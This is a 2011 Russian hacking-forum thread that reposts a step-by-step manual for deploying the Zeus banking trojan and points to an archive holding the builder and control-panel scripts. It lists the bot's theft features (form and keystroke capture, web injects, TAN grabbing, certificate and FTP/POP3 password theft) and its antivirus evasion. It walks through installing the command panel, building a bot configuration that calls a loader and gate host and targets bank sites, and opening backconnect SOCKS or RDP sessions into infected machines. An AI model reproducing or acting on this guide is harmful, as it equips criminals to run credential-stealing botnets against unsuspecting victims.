1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Настройка Zeus. Подробная инструкция.

Тема в разделе "Статьи", создана пользователем onthar, 12 мар 2011.

  1. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    Подробнейший мануал по Zeus + Видео (только для новичков)

    Автор: Zorgus, http://forum.xakep.ru/m_1797476/tm.htm
    Здравствуйте, продолжаем наши видео уроки для новичков
    Сегодня мы затронем тему Zeus
    В конце мануала вы найдете архив:
    TEXT_MANUAL – Подробнейший мануал от автора
    Zeus sсriрts – Скрипты админки (Zeus 1.3.2.1 ) и билдер бота (Zeus 1.2.7.19)
    Zeus_video – И само видео.

    Полное описание от автора
    Код:
    Zeus-настройка и описание 
    ________________________________________
    ZeuS -Вирус(далее "бот") для MS Windows служит для управления компьютерами жертв и получения с них информации при помощи ведения логов.Вообщем то говоря просто это вирус,крадущий историю переходов по страницам инета,запоминающий и передающий своему "хозяину" Всю эту информацию,не включающую в себя пароли от почтовых программ,асек и всего прочего,что не имеет контакт с браузером.
    
    В простонародье вирусмейкеров этот вирус называют Зеусом или Зевсем.
    
    ZeuS состоит из трех частей:
    Панель управления, которая устанавливается на сервер(а).
    Билдер, является приложением для Windows, служит для задания конфигурации бота.
    Бот, является приложением для Windows, но уже запускается на компьютере жертвы.
    Внимание! В зависимости от количества активных ботов, сборки, и настройки, вам понадобится от обычного хостинга до мощного сервера или серверов.
    
    ZeuS имеет следующие основные возможности и свойства (здесь приведен полный список, в вашей сборке часть этого списка может отсутствовать):
    Бот:
    Написан на VC++ 8.0, без использования RTL и т.д., на чистом WinAPI, за счет этого достигается маленький размер (10-25Кб, зависит от сборки).
    Не имеет собственного процесса, за счет этого нельзя обнаружить в списке процессов.
    Обход большинства фаерволов (включая популярный Outpost Firewall версий 3, 4, но сущетвует временная небольшая проблема с антишпионом). Не дает гарантии беспрепятственного приема входящих соединений.
    Сложно обнаружить поиском/анализом, бот устанавливается жертве и создает файл с временем системных файлов и произвольным размером.
    Работает в лимитированных учетных записях Windows (работа в гостевой учетной записи в настоящее время не поддерживается).
    Невидим для экваристики антивирусов, тело бота зашифровано.
    Некоем образом не создает подозрения на свое присутствие, если вы это не захотите. Здесь имеется ввиду то, что любят делать многие авторы spyware: выгрузка фаерволов, антивирусов, запрет на их обновление, блокировка Ctrl+Alt+Del и т.д.
    Блокировка Windows Firewall (данная функция требуется только для беспрепятственного приема входящих соединений).
    Все свои настройки/логи/команды бот хранит/принимает/передает в зашифрованном виде по HTTP(S) протоколу. (т.е. в текстовом виде данные будете видеть только вы, все остальное бот<->сервер будет выглядеть как мусор).
    Обнаружение NAT при помощи проверки своего IP через указанный вами сайт.
    Отдельный файл конфигурации, что позволяет себя защитить от потери ботнета в случаи недоступности основного сервера. Плюс дополнительные (резервные) файлы конфигурации, к которым бот будет обращаться, когда не будет доступен основной файл конфигурации. Эта система гарантирует выживание вашей ботнета в 90% случаях.
    Возможность работать с любыми браузерами/программами работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.):
    Перехват POST-данных + перехват нажатых клавиш (включая вставленные данные из буфера обмена).
    Прозрачный URL-редирект (на фейк-сайты и т.д.) c заданием простейших условий редиректа (например: только при GET или POST запросе, при наличии или отсутствии определенных данных в POST-запросе).
    Прозрачная HTTP(S) подмена содержимого (Веб-инжект, который позволяет подменять не только HTML страницы, но и любой другой тип данных). Подмена задается при помощи указания масок подмены.
    Получение содержимого нужной страницы с исключением HTML-тегов. Основано на Веб-инжекте.
    Настраиваемый TAN-граббер для любых стран.
    Получения списка вопросов и ответов в банке "Bank Of America" после успешной авторизации.
    Удаление нужных POST-данных на нужных URL.
    Идеальное решение для виртуальных клав-ур: После захода на нужную URL, происходит получение скриншота в области экрана, где была нажата левая кнопка мыши.
    Получение сертификатов из хранилища "MY" (сертификаты с пометкой "Не экспортируемый" не экспортируются корректно) и его очистка. После это любой импортируемый сертификат будет сохранен на сервер.
    Перехват логина/пароля протоколов POP3 и FTP в независимости от порта и запись его в лог только при удачной авторизации.
    Изменение локального DNS, удаление/добавление записей в файл %system32%\drivers\etc\hosts, т.е. сопоставление указанного домена с указанным IP для WinSocket.
    Сохраняет содержимое Protected Storage при первом запуске на компьютере.
    Удаляет Сookies из кэша Internet Explorer при первом запуске на компьютере.
    Поиск на логических дисках файлов по маске или загрузка конкретного файла.
    Запись только что посещенных страницы при первом запуске на компьютере. Полезен при установки через сплойты, если вы покупаете загрузки у подозрительного сервиса, можно узнать что грузится еще параллельно.
    Получение скриншота с компьютера жертвы в реальном времени, компьютер должен находится вне NAT.
    Прием команд от серверной части и отправка отчета назад об успешном выполнении. (В настоящее время запуск локального/удаленного файла, немедленное обновление файла конфигурации, уничтожение ОС).
    Socks4-сервер.
    HTTP(S) PROXY-сервер.
    Обновление бота до последней версии (URL новой версии прописывается в файле конфигурации).
    
    Панель управления:
    Для работы требуется PHP + MySQL.
    Простой инсталлятор (обычно хватает ввода данных юзера MySQL и нажатия кнопки 'Install').
    Многопользовательский режим, каждому пользователю можно задать определенные права доступа.
    Статистика установок(инсталлов, заражений).
    Статистика ботов находящихся в онлайн.
    Разделение ботнета на сабботнеты.
    Обзор онлайновых ботов (так же возможен фильтр)
    Просмотр скриншота в реальном времени.
    Просмотр и проверка Sock4.
    Время нахождения бота в онлайн.
    Скорость соединения (только для ботов вне NAT).
    Хранении логов в базе данных. Это дает следующие преимущества:
    Поиск логов по фильтру содержимого.
    Поиск логов по шаблонам с выделением нужных POST данных (например позволяет выделять на сайте [link=http://rambler.ru/]http://rambler.ru/[/link] только логи и пароль, отбрасывая при поиски все остальные данные).
    Хранение логов в зашифрованных файлах, в структуре директорий ботнет\страна\ID компьютера.
    Отдача команд ботам (так же возможен фильтр).
    При знании PHP вы можете самостоятельно перенастроить панель управления по вашем вкусу.
    
    Билдер:
    Написан на VC++ 8.0, без использования RTL и т.д. на чистом WinAPI, за счет этого достигается маленький размер (зависит от сборки, в сборке с декодером логов размер будет более 400кб, т.к. будет включена база стран по IP).
    Просмотр статуса текущей системы, в качестве теста бота вы можете запустить его на своем компьютере, а потом нажатием одной кнопки удалить его.
    Декодер логов, с распределением по странам.
    Билдер файла конфигурации (шифрованного) и самого бота.
    Полиморфный криптор BETA. В настоящее время находится на стадии тестирования, и не гарантирует сто процентную защиту от антивурсов. Но гарантировано доведение данной функции до ума в ближайшее время.
    
    
    После скачивания программы ZeuS настоятельно рекомендуется проверить её антивирусом. Файлы, которые вы загружаете никем не проверены и вы скачиваете их на свой страх и риск. Некоторые программы, которые вы можете найти на сайте, могут определяться антивирусами как hack tools (хакерская программа). Такие программы не наносят вреда вашему компьютеру, однако, стоит учитывать, что в некоторых случаях их использование может попасть под 272-273 статью УК РФ.
    Настройка бота
    Пошаговая установка:
    1)Из имеющегося у вас пакета сборки, запустите файл 'local\cp.exe', это билдер файла конифгурации и бота
    2)Откройте раздел 'Builder'. Нажмите кнопку 'Browse' и укажите там файл конфигурации, имя котрого 'local\config.txt'. 
    3)Нажмите кнопку 'Edit config', в результате должен запуститься текстовый редактор. Перенастройте файл вот так:
    
    1!
    Исходный файл конфигурации представляет собой текстовый файл в кодировки Windows, и нужен только для создания конечного файла конфигурации (который представляет собой бинарный файл для загрузки ботом) и самого бота. В вашем пакете сборки пример файла конфигурации должен находится в папке 'local' и иметь имя config.txt. Откройте файл можно в любом текстовом редакторе, например 'Блокнот'(Notepad). 
    
    Файл состоит из записей, по одной записи в строку. Запись же состоит из параметров, первый параметр обычно определяет имя записи (но это не всегда так, например, в случаи когда идет перечисление каких либо данных, имени нет). Параметры разделяются между собой пробелами, если же в самом параметре встречается пробел, или символ табуляции, этот параметр следует заключить в двойные кавычки ("), тоже правило применятся и к имени. Количество параметров не ограничено, также если у записи есть имя, то оно читается без учета регистра
    Примеры:
    username Kot Matroskin
    название записи - username, параметр 1 - Kot, параметр 2 - Matroskin.
    
    
    username "James" Bond"
    название записи - username, параметр 1 - James, параметр 2 - Bond.
    
    
    username "Volodia Putin"
    название записи - username, параметр 1 - Volodia Putin.
    
    
    "url" "http://sex.com/" index.php
    название записи - url, параметр 1 - [link=http://sex.com/,]http://sex.com/,[/link] параметр 2 - index.php 
    
    Также существуют специальные имена записей, которые позволяет делить файл конфигурации насколько угодно подразделов, которые могут содержать внутри себя сколько угодно подразделов и записей. Они называются разделами и состоят из имени entry и параметра определяющего название раздела (регистр также не учитывается в данном параметре), окончание же раздела обозначается записью end. Далее в документации, вложенность записи относительно подразделов, будут обозначатся через ->. Т.е. записиь с именем username принадлежащая разделу userdata, будет обозначена как userdata->username и т.д.
    
    Примеры:
    entry "userdata"
    fname "petia"
    lname "lolkin"
    end
    
    
    entry compdata
    name "pcvasya"
    entry devices - содержимое раздела, пример, когда записи не имеют имени, здесь просто идет перечисление устройств.
    cdrom
    "hdd"
    fdd
    end
    end 
    
    Также существует возможность вставки комментариев, комментарий должен находиться в отдельной строке, и начинаться с символа ';'. Если получается, что первый параметр в записи тоже начинается с ';', то этот параметр следует заключить в кавычки.
    
    Примеры:
    ;Hello.I think that I'm hero!
    ;How are you/ -это не запись
    ";I love you" - а вот это уже запись. 
    
    
    2!
    
    
    Записи файла конфигурации
    Файл состоит из двух разделов StaticConfig и DynamicConfig.
    
    StaticConfig, значения этого раздела прописываются непосредственно в файл бота, т.е. в exe, и определяют основное поведение бота на компьютере жертвы.
    В зависимости от вашей сборки, некоторые параметры могут не иметь для вас значения, все значимые параметры прописаны в примере, прилагаемом к пакету сборки. 
    botnet [строка] - определяет название ботнета, которому принадлежит бот.
    строка - название ботнета, до 4-х символов, или 0 - для значения по умолчанию.
    
    Рекомендуемое значение: botnet 0
    
    
    timer_config [число1] [число2] - определяет промежутки времени через которое следует получить обнавление файла конфигурации.
    число1 - определяет время в минутах через которое следует обновить файл конфигурации, в случаи успешной загрузки предыдущий раз.
    число2 - определяет время в минутах через которое следует обновить файл конфигурации, в случаи ошибки при загрузки предыдущий раз.
    
    Рекомендуемое значение: timer_config 60 5
    
    
    timer_logs [число1] [число1] - определяет промежутки времени через которое следует отправлять накопленные логи на сервер.
    число1 - определяет время в минутах через которое следует отправить логи, в случаи успешной отправки предыдущий раз.
    число2 - определяет время в минутах через которое следует отправить логи, в случаи ошибки при отправки предыдущий раз.
    
    Рекомендуемое значение: timer_logs 2 2
    
    
    timer_stats [число1] [число2] - определяет промежутки времени через которое следует отправлять статистику на сервер. (сюда входят инасталлы, нахождение в онлайн, открытые порты сервисов socks, скриншоты и т.д.)
    число1 - определяет время в минутах через которое следует отправить статистику, в случаи успешной отправки предыдущий раз.
    число2 - определяет время в минутах через которое следует отправить статистику, в случаи ошибки при отправки предидущий раз.
    
    Рекомендуемое значение: timer_logs 20 10
    
    
    url_config  - URL по который расположен основн...ать ,чем дополнять статью...
    [/code][/center]
     
    Последнее редактирование: 12 мар 2011
    12 мар 2011
  2. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    Руководство пользователя (ЧЕРНОВИК)
    Код:
    ==============
    = Содержание =
    ==============
    
    1. Описание и возможности.
    2. Настройка сервера.
      2.1. HTTP-сервер.
      2.2. Интерпретатор PHP.
      2.3. MySQL-сервер.
      2.4. Панель управления.
        2.4.1. Установка.
        2.4.2. Обновление.
        2.4.3. Файл /system/fsarc.php.
    3. Настройка бота.
    4. Работа с BackConnect.
    5. История версий.
    6. F.A.Q.
    7. Мифы.
    
    ==============================
    = 1. Описание и возможности. =
    ==============================
    ZeuS - программное обеспечение для кражи личных данных пользователей с удаленных систем Windows. На 
    простом языке "Троян", "Бэкдор", "Вирус". Но автор не любит эти слова, поэтому далее в документации
    он будет называть это программное обеспечение "Бот". 
    
    Бот полностью основан на перехвате WinAPI в UserMode (Ring3), это значит, что бот не использует
    каких-либо драйверов и обращений в Ring0. Эта особенность дает возможность запускаться боту даже из
    Гостевых учетных записей Windows. Плюс это гарантирует повышенную стабильность, и адаптивность
    к последующим версиям Windows.
    
    Бот разрабатывается на Visual C++ версии 9.0+, при этом не используются дополнительные библиотеки
    типа msvcrt, ATL, MFC, QT и т.д. Код бота пишется со следующими приоритетами (в порядке уменьшения):
      1. стабильность (старательно проверяются все результаты вызова функций и т.д.),
      2. размер       (избегаются повторы алгоритмов, повторы вызовов функций и т.д.),
      3. скорость     (нет инструкций типа while(1){..}, for(int i = 0; i < strlen(str); i++){..}).
    
    Функции и особенности бота:
      1. Снифер трафика для протокола TCP.
         1.1. Перехват FTP логинов на любом порту.
         1.2. Перехват POP3 логинов на любом порту.
         1.3. Перехват любых данных из трафика (персональный заказ).
      
      2. Перехват HTTP/HTTPS запросов для wininet.dll, т.е. всех программ работающих с этой
         библиотекой. Сюда входят Internet Explorer (любая версия), Maxton, и т.д.
         2.1. Подмена ..
         
      3. Функции сервера.
         3.1 Socks4/4a/5.
         3.2 Бэкконект для любого сервиса(RDP, Socks, FTP, и.т.д.) на зараженной машине. Вы можете
             получить доступ к компьютеру, который находится за NAT, или, например, к которому
             запрещены подключения из интернета.
         3.3 Получение скриншота экрана в реальном времени.
    -- не дописано ---
    
    =========================
    = 2. Настройка сервера. =
    =========================
    Сервер является центральной точкой управления ботнетом, он занимается сборкой отчетов ботов,
    и отдачей команд ботам. Крайне не рекомендуется использовать "Виртуальный Хостинг" или "VDS", т.к.
    при увеличение ботнета, нагрузка на сервер будет увеличиваться, и такой вид хостинга довольно 
    быстро исчерпает свои ресурсы. Вам нужен "Выделенный сервер" (Дедик), рекомендуемая минимальная 
    конфигурация:
    
    1. 2Гб ОЗУ.
    2. 2x процессор частотой 2Ггц, 
    3. SATA винчестер 7200rpm+
    
    Для работы бота необходим HTTP-сервер с подключенным PHP + Zend Optimizer, и MySQL-сервер. 
    
    ВНИМАНИЕ: Для Windows-систем очень важно изменить(создать) следующее значение реестра:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\MaxUserPort=dword:65534
    (десятичное)
    
    ---------------------
    - 2.1. HTTP-сервер. -
    ---------------------
    В качестве HTTP-сервера рекомендуется использовать: для nix-систем - Apache от версии 2.2, для
    Windows-систем - IIS от версии 6.0. Рекомендуется держать HTTP-сервер на 80 или 443 порту (это
    положительно влияет на отстук бота, поскольку провайдеры/прокси могут блокировать доступ на иные,
    нестандартные порты).
    
    Загрузить Apache: [link=http://apache.org/dyn/closer.cgi]http://apache.org/dyn/closer.cgi[/link]
    Сайт IIS: [link=http://www.iis.net/]http://www.iis.net/[/link]
    
    ---------------------------
    - 2.2. Интерпретатор PHP. -
    ---------------------------
    Последняя версия панели управления разрабатывалась на PHP 5.2.6. Поэтому крайне рекомендуется 
    использовать версию, не ниже этой версии. Но в крайнем случаи не ниже 5.2.
    
    Важно произвести следующие настройки в php.ini:
    
    safe_mode = Off
    magic_quotes_gpc = Off
    magic_quotes_runtime = Off
    memory_limit = 256M  ;Или выше.
    post_max_size = 100M ;Или выше.
    
    а также рекомендуется изменить следующие настройки:
    
    display_errors = Off
    
    Также понадобиться подключить Zend Optimizer (ускорение работы скриптов, и запуск защищенных
    скриптов). Рекомендуется версия от 3.3.
    
    Не рекомендуется подключать PHP к HTTP-серверу через CGI.
    
    Загрузить PHP: [link=http://www.php.net/downloads.php]http://www.php.net/downloads.php[/link]
    Загрузить Zend Optimizer: [link=http://www.zend.com/en/products/guard/downloads]http://www.zend.com/en/products/guard/downloads[/link]
    
    ----------------------
    - 2.3. MySQL-сервер. -
    ----------------------
    MySQL требуется для хранения всех данных об ботнете. Рекомендуемая версия не ниже 5.1.30, так же
    стоит учесть, что при работе панели управления в более старых версиях были обнаружены некоторые
    проблемы. Все таблицы панели управления идут в формате MyISAM, важно правильно оптимизировать
    быстродействие работы с этим форматом, исходя из доступных ресурсов сервера.
    
    Рекомендуется внести следующие изменения в настройки MySQL-сервера (my или my.ini):
    
    max_connections=2000 #Или выше
    
    Загрузить MySQL: [link=http://dev.mysql.com/downloads/]http://dev.mysql.com/downloads/[/link]
    
    ---------------------------
    - 2.4. Панель управления. -
    ---------------------------
    
    2.4.1. Установка.
    *****************
    Назначение файлов и папок:
    /install           - инсталлятор.
    /system            - системные файлы.
    /system/fsarc.php  - скрипт для вызова внешнего архиватора (раздел 2.4.3).
    /system/config.php - файл конфигурации.
    /theme             - файлы темы (дизайн), без зенда, могут свободно изменяться.
    cp.php             - вход в панель управления.
    gate.php           - гэйт для ботов.
    index.php          - пустой файл для предотвращения листинга файлов.
    
    Панель управления обычно расположена в вашем дистрибутиве в папке server
    
    
    PHP:
    Все содержимое этой 
    папки необходимо загрузить на сервер в любую папку доступную по HTTP
    Если вы загружаете ее через 
    FTP
    то все файлы нужно загрузить в БИНАРНОМ режиме.

    Для nix-систем выставите права:
    /.      - 
    777
    /system 777
    /tmp    777

    Для Windows
    -систем:
    \
    system права на полные права на записьчтение для пользователя из под которого происходит доступ
              через HTTP
    Для IIS это обычно IUSR_*.
    \
    tmp    также как и для \system.

    После того как все файлы загруженынеобходимо через браузер запустить инсталлятор по URL
    [link=http://%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80/%D0%BF%D0%B0%D0%BF%D0%BA%D0%B0/install/index.php.]http://сервер/папка/install/index.php.[/link] Следуйте появившимся инструкциям, в случаи возникновения 
    ошибок (вы будете подробно уведомленыв процесс установкипроверти правильность введенных данных
    и правильность установки прав на папки.

    После установкирекомендуется удалить директорию installи переименовать файлы cp.php (вход в 
    панель управления
    и gate.php (гэйт для ботовв любые файлы по вашему желанию (расширение менять
    нельзя
    ).

    Теперь вы можете благополучно входить в панель управлениявведя в браузере URL переименованного
    файла cp
    .php.

    2.4.2Обновление.
    ******************
    Если вы обладаете более новой копией панели управленияи желаете обновить старую версиюто 
    необходимо сделать следующие
    :

    1Скопировать файлы новой панели управления на место старых.
    2Переименовать файлы cp.php и gate.php согласно их реальным именам выбранным вами при установке
       старой панели управления
    .
    3На всякой случайповторно выставить права на директории согласно пункту 2.4.
    4Через браузер запустить инсталлятор по URL [link=http://%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80/%D0%B4%D0%B8%D1%80%D0%B5%D0%BA%D1%82%D0%BE%D1%80%D0%B8%D1%8F/install/index.php,]http://сервер/директория/install/index.php,[/link] и
       
    следовать появившимся инструкциямПроцесс работы инсталлятора может занять достаточно большой
       промежуток времени
    это связано с темчто некоторые таблицы с отчетами могут пересоздаваться.
    5Можно пользоваться новой панелью управления.

    2.4.3Файл /system/fsarc.php.
    ******************************
    Данный файл содержит в себе функцию для вызова внешнего архиватораВ данный момент архиватор
    используется только в модуле 
    "Отчеты::Поиск в файлах" (reports_files), и вызывается для загрузки
    файлов и папок в виде одного архива
    По умолчанию функция настроена на архиватор Zipи является
    универсальной для Windows и nix
    поэтому все что вам нужно сделатьэто установить в систему этот 
    архиватор
    и дать права на его исполнениеВы также можете отредактировать этот файл для работы с
    любым архиватором
    .

    Загрузить Zip: [link=http://www.info-zip.org/Zip.html.]http://www.info-zip.org/Zip.html.[/link]

    ======================
    3. Настройка бота. =
    ======================

    ===========================
    4. Работа с BackConnect =
    ===========================
    Работа с BackConnect рассматривается в виде примера.

    IP BackConnect-сервера 192.168.100.1 
    Порт для бота
    4500
    Порт для клиентского приложения
    1080

    1
    Запускается серверное приложение(zsbcs.exe или zsbcs64.exeна сервере имеющем свой IP в
       интернете
    для приложения указывается портна котором ожидается подключение от ботаи порт к
       которому будет подключаться клиентское приложение
    Например zsbcs.exe listen -cp:1080 -bp:4500,
       
    где 1080 клиентский порт4500 порт для бота.

    2Необходимому боту отправляется команда bc_add service server_host server_portгде service 
       
    номер порта или имясервисак которому необходимо подключится на боте
       
       *
    в настоящее время поддерживается только имя socksкоторое позволяет подключится к встроенному в
       бота Socks
    -серверу.

       
    server_host серверна котором запушено серверное приложениеЗдесь может быть указан IPv4,
                     
    IPv6или домен.
       
    server_port порткоторый указан в опции cp серверного приложениеВ данном случаи 4500.

       Пример
    bc_add socks 192.168.100.1 4500 в результате вы получаете socks,
               
    bc_add 3389  192.168.100.1 4500 в результате вы получаете rdp.

    3Теперь необходимо ждать подключение бота к серверув этот период любая попытка клиентского
       приложения подключится будет игнорироваться 
    (будет происходить отключение клиента). Знаком
       подключения бота
    будет вывод в консоль сервера строки "Accepted new conection from bot...".

    4После подключения ботавы можете работать со своим клиентским приложениемТ.евы просто
       подключаетесь к серверу на клиентский порт 
    (в данном случаи 1080). Напримересли вы отдали
       команду socks
    то на клиентском порту вас будет ожидать Socks-сервересли указали порт 3389то
       вы подключаетесь к 192.168.100
    :1080 как к обычному RDP.

    5После тогокогда вам не нужен BackConnect от бота для определенного сервисанеобходимо отдать
       команду bc_del service server_host server_port
    где все параметры должны быть идентичны
       параметрам bc_add
    которые необходимо удалитьТакже здесь можно использовать спецсимволы
       
    '*' и '?'.

       
    Напримерbc_del * * * - удалит все BackConnect'ы, указанные на боте.
                 bc_del * 192.168.* * удалит все BackConnect’ы, подключаемые к серверам с IP 192.168.*.
                 bc_del 3389 192.168.100.1 4500 - удалит конкретно один BackConnect.

    ПРИМЕЧАНИЯ: 
    1) Вы можете указывать сколько угодно BackConnect'
    ов (т.еbc_add), но у них не должна быть общая
       комбинация IP 
    PortНо в случаи наличия такой комбинациибудет запускаться первая добавленная.
    2Для каждого BackConnect'а, вы должны запускать отдельное серверное приложение.
    3) В случаи разрыва соединения(падения сервера, падение бота и т.д.), бот будет повторят подключение
       к серверу бесконечно(даже после перезагрузки PC), до тех пор пока BackConnect не будет удален
       (т.е. bc_del).
    4) В качестве service для bc_add, может быть использован любой порт открытый по адресу 127.0.0.1.
    5) Серверное приложение поддерживает IPv6, но в принципе в настоящее время эта поддержка не особо
       актуальна.
    6) Возможен запуск серверного приложения под wine. Написание же elf приложения в настоящее время не
       планируется.   
    7) Крайне рекомендуется использовать в опции bp серверного приложения популярные порты (80, 8080,
       443 и т.д.), т.к. иные порты могут быть заблокированы провайдером которому принадлежит бот.
    8) Нельзя позволят подключатся разным ботам на один и тот же серверный порт одновременно.
    9) Метод такого подключения может пригодиться и для ботов, которые находятся вне NAT, т.к. иногда
       фаерволами Windows или провайдерами, могут быть заблокированы подключения из интернета.

    ПРИМЕЧАНИЕ: Данная функция доступна не во всех сборках бота.

    ======================
    = 5. История версий. =
    ======================
    Условные метки:
    [*] - изменение.
      [-] - исправление.
      [+] - добавление.

    [Версия 1.2.0.0, 20.12.2008]
      Общее:
    [*] Более не будет документации в chm-файле, все будет писаться в этот файл.
        [+] Теперь бот способен получать команды не только при отправки статуса, но и при отправки
            файлов/логов.
        [+] Локальные данные, запросы к серверу, и файл конфигурации шифруются RC4 с ключом на
            ваш выбор.
    [*] Полностью обновлен протокол бот <-> сервер. Возможно, понизится нагрузка на сервер.
      
      Бот:
        [-] Устранена ошибка, блокирующая бота на лимитированных ученых записях Windows.
    [*] Написан новый PE-криптор, теперь PE-файл получается очень аккуратным и максимально
            имитирует результат работы MS Linker 9.0.
    [*] Обновлен процесс сборки бота в билдере.
    [*] Оптимизировано сжатие файла конфигурации.
    [*] Новый формат бинарного файла конфигурации.
    [*] Переписан процесс сборки бинарного файла конфигурации.
    [*] Socks и LC теперь работают на одном порту.
      
      Панель управления:
    [*] Статус панели управления переведен в BETA.
    [*] Изменены все таблицы MySQL.
    [*] Начет постепенный перевод Панели Управления на UTF-8 (возможны временные проблемы с
            отображением символов).
    [*] Обновлена геобаза.

    [Версия 1.2.1.0, 30.12.2008]
      Бот:
    [*] BOFA Answers теперь отсылается как BLT_GRABBED_HTTP (было BLT_HTTPS_REQUEST).
        [-] Мелкая ошибка при отправке отчетов.
        [-] Размер отчета не мог превышать ~550 символов.
        [-] Ошибка существующая с начала существования бота: низкий таймаут для отсылки POST-запросов, 
            в результате чего блокировалась отсылка длинных (более ~1 Мб) отчетов на медленных
            соединениях (не стабильных), как теоретическое последствие - бот вообще переставал слать
            отчеты.
      
      Общее:  
        [+] В случаи записи отчета типа BLT_HTTP_REQUEST и BLT_HTTPS_REQUEST в поле SBCID_PATH_SOURCE
            (в таблице будет path_source) добавляется путь URL.
      
      Панель управления:
    [*] Обновлен redir.php.

    [Версия 1.2.2.0, 11.03.2009]
      Бот:
        [-] Устранена ошибка в HTTP-инжектах существующая на протяжении ВСЕХ версий бота. При
            использовании в программе асинхронного режима wininet.dll, был упущен момент
            синхронизации потоков создаваемых wininet.dll, в результате чего, при некоторых условиях
            происходило исключение.
        [+] При срабатывании HTTP-инжекта, теперь также изменяются файлы в локальном кэше.
            Отсутствие этой доработки, позволяло не всегда срабатывать HTTP-инжектам.
        [+] Уменьшен размер PE-файла.

    [Версия 1.2.3.0, 28.03.2009]
      Бот:
        [-] Мелкие ошибки в крипторе, спасибо доблестным говноаналитикам из Avira.

      Общее:
    [*] Изменен протокол раздачи команд ботам.
      
      Панель управления:
    [*] Полностью переписана панель управления.
    [*] Дизайн переписан на XHTML 1.0 Strict (под IE не работает).
    [*] Бот теперь опять способен получать команды только при отправке отчета об онлайн-статусе 
            (слишком высокая нагрузка).
    [*] Обновлена геобаза.

    [Версия 1.2.4.0, 02.04.2009]
      Бот:
        [+] При работе с HTTP, заголовок User-Agent теперь читается от Internet Explorer, а не
            является константой как раньше. Теоретически из-за постоянного User-Agent'
    азапросы
            могли блокироваться провайдерами
    или попадать под подозрение.

      
    Панель управления:
        [-] 
    Исправлена ошибка отображения отчетовсодержащих символы 0-31 и 127-159.

    =============
    6. F.A.Q. =
    =============
    QЧто значат цифры в версии?
    Aa.b.c.d
        a 
    полное изменение в устройстве бота
        
    крупные изменениякоторые вызывают полную или частичную несовместимость с предыдущими
            версиями
    .
        
    исправления ошибокдоработкидобавление возможностей.
        
    номер чистки от антивирусов для текущей версии a.b.c.

    QКаким образом генерируется Bot ID?
    ABot ID состоит из двух частей: %name%_%number%, где name имя компьютера (результат от
       GetComputerName
    ), а number некое числогенерируемое на основе некоторых уникальных данных ОС.

    QПочему трафик шифруется симметричным методом шифрования (RC4), а не асимметричным (RSA)?
    AПотому чтов использовании сложных алгоритмов нет смыслашифрование нужно только для скрытия
       трафика
    Плюс в RSA тольков том что не зная ключа находящегося в Панели управленияне будет
       возможности эмулировать ее ответы
    А какой смысл защищаться от этого (с глобальной точки
       зрения
    )?

    QЯ повредил таблицы/файлы панели управлениячто делать?
    AВоспроизвести инструкцииуказанные в пункте 2.5.

    ===========
    7. Мифы =
    ===========
    MZeuS использует DLL для своей работы.
    AЛожьСуществует только один исполняемый PE файл (exe). Dllsys и т.дне когда не было и
       врятли когда
    -либо будетЭтот миф пошел в результате тогочто в некоторых версия бота для
       хранения настроек
    используются файлы с такими расширениями.
       
    MZeuS использует COM (БХОдля перехвата Internet Explorer.
    AЛожьВсегда для этого использовался перехват WinAPI из wininet.dll.[/code][/center]
     
    12 мар 2011
  3. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    Приступим к настройке:
    Нам понадобиться хостинг с поддержкой Mysql и PHP
    Создадим базу данных и перейдем к установке админки
    Перенесем содержимое папки ./Zeus sсriрts/Web на наш хостинг и запустим через браузер инсталлятор
    Пример:
    http://test1.ru/install/index.php
    Видим следующее:
    Рис 1.
    [​IMG]

    Control Panel 1.3.2.1 Installer
    Root user:
    User name: (1-20 chars): // Вводим логин пользователя
    Password (6-64 chars): // Вводим пароль пользователя
    MySQL server:
    Host: // Host Mysql – Обычно это localhost
    User: // Имя user базы данных
    Password: // Пароль user базы данных
    Database: // Имя базы данных
    Local folders:
    Reports: // Название папки с отчетами, по дефолту стоит _reports
    Options:
    Online bot timeout: // Таймаут бота, по дефолту стоит 25
    Encryption key (1-255 chars): // Ключ бота, от 1 до 255 латинских символов
    Enable write reports to database. // Сохранять отчеты в базу данных?
    Enable write reports to local path. // Сохранять отчеты в локальную папку (по дефолту _reports) ?
    После ввода всех данных, жмем Install и дожидаемся установки.
    После видим следующее:
    Рис 2.
    [​IMG]
    Это значит, что установка завершена
    Удаляем с хостинга папку install она нам больше не понадобится
    Можем смело направляться в админку http://test1.ru/cp.php
    Рис 3.
    [​IMG]
    Вводим логин и пароль указанные при установке скриптов.
    И попадаем в админку:
    Рис 4.
    [​IMG]
    Пол дела сделано.
    Теперь переходим к настройке бота ./Zeus sсriрts/Builder 1.2.7.19
    Видим 4 файла:
    config.txt // Конфигуратор бота
    webinjects.txt // Файл со стандартными инжектами
    webinjects new.txt // Файл с дополнительными инжектами, если хотим воспользоваться, просто переименуйте в webinjects txt
    zsb.exe // Сам билдер Zeus
    Запускаем билдер, переходим на вкладку Builder:
    Рис 5.
    [​IMG]
    Билдер сам нашел путь к config.txt
    Жмем Edit Config:
    Код:
    ;Build time:   09:48:52 12.08.2009 GMT
    ;Version:      1.2.7.19
    
    entry "StaticConfig"
      ;botnet "btn1"
      timer_config 60 1
      timer_logs 1 1
      timer_stats 20 1
      url_config "http://test1.ru/cfg2.bin"
      url_compip "http://cmyip.com/" 4096
      encryption_key "122122"
      ;blacklist_languages 1049
    end 
    
    entry "DynamicConfig"
      url_loader "http://test1.ru/bot.exe"
      url_server "http://test1.ru/gate.php"
      file_webinjects "webinjects.txt"
      entry "AdvancedConfigs"
        ;"http://host/cp/cfg1.bin"
      end
      entry "WebFilters"
        "!*.microsoft.com/*"
        "!http://*myspace.com*"
        "https://www.gruposantander.es/*"
        "!http://*odnoklassniki.ru/*"
        "!http://vkontakte.ru/*"
        "@*/login.osmp.ru/*"
        "@*/atl.osmp.ru/*"
      end
      entry "WebDataFilters"
        ;"http://mail.rambler.ru/*" "passw;login"
      end
      entry "WebFakes"
        ;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
      end
      entry "TANGrabber"
